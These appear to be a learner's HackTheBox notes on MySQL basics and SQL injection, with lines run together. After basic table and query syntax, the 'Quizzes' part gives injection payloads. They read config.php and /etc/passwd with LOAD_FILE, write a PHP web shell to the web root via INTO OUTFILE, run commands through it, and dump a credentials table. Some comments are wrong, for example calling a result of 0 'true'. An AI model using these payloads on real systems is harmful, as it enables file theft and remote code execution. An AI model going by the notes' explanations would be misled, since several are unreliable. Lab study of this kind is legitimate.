mysql
Apache's configuration found at /etc/apache2/apache2.conf
Nginx's configuration at /etc/nginx/nginx.conf
IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.configmysql -u root -pmysql -u root -p<password>mysql -u root -h docker.hackthebox.eu -P 3306 -p CREATE DATABASE users;CREATE TABLE logins (
id INT,
username VARCHAR(100),
password VARCHAR(100),
date_of_joining DATETIME
);
CREATE TABLE logins (
id INT NOT NULL AUTO_INCREMENT,
username VARCHAR(100) UNIQUE NOT NULL,
password VARCHAR(100) NOT NULL,
date_of_joining DATETIME DEFAULT NOW(),
PRIMARY KEY (id)
);# Will display the details of that table such as fields and data types
DESCRIBE logins;# Auto increment and don't have any duplicate
id INT NOT NULL AUTO_INCREMENT,# Return date and time
date_of_joining DATETIME DEFAULT NOW(),# Skip the ssl verification
mysql -u root -h 94.237.61.84 -P 59610 -p --skip-sslINSERT INTO table_name VALUES (column1_value, column2_value, column3_value, ...);
INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');
INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');show databases;
use database1;
show tables;SELECT * FROM table_name;
SELECT column1, column2 FROM table_name;# Remove table
DROP TABLE logins;ALTER TABLE logins ADD newColumn INT;
# Rename a column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;
# Change the datatype of a column
ALTER TABLE logins MODIFY oldColumn DATE;
# Remove a column
ALTER TABLE logins DROP oldColumn;# Update a column
UPDATE logins SET password = 'change_password' WHERE id > 1;# Arrange the result
SELECT * FROM logins ORDER BY password;
# Asc or Desc
SELECT * FROM logins ORDER BY password DESC;
SELECT * FROM logins ORDER BY password DESC, id ASC;
# Limiting the result
SELECT * FROM logins LIMIT 2;
# Select only 2, 3
# It will return id 2 and 3 since the id 1 starts with 0
# It's like array
SELECT * FROM logins LIMIT 1, 2;SELECT * FROM logins WHERE id > 1;
SELECT * FROM logins where username = 'admin';
# Select result like admin
SELECT * FROM logins WHERE username LIKE 'admin%';
# Seletct result that has 3 characters
SELECT * FROM logins WHERE username like '___';SELECT 1 = 1 AND 'test' = 'test';
SELECT 1 = 1 && 'test' = 'abc';
SELECT 1 = 1 OR 'test' = 'abc';
SELECT 1 = 1 || 'test' = 'abc';
# It will return 0 means true
SELECT NOT 1 = 1;
SELECT 1 != 1;
# It will return 1 means false
SELECT NOT 1 = 2;
SELECT * FROM logins WHERE username != 'john';
SELECT * FROM logins WHERE username != 'john' AND id > 1;
SELECT * FROM logins WHERE username != 'tom' AND id > 3 - 2;# Quizzes
select * from titles where emp_no > 10000 or title !='engineer';
select first_name,last_name,hire_date from employees where first_name like 'Bar%' and hire_date = '1990-01-01';
select * from employees UNION select dept_no,dept_name,3,4,5,6 from departments;
' UNION select 1,user(),3,4-- -
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
/shell.php?0=cat ../flag.txt# Union
UNION SELECT username, 2, 3, 4 from passwords-- '# This will display the privilege of the current db user
SELECT super_priv FROM mysql.user# Displays the file /etc/passwd
SELECT LOAD_FILE('/etc/passwd');# If it is an empty value means that we can read files anywhere in the system
# But if the value is NULL we can't do anything in the system
# We can read files if the user have a FILE privilege
SHOW VARIABLES LIKE 'secure_file_priv';
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
SELECT * from users INTO OUTFILE '/tmp/credentials';
cat /tmp/credentials;Last updated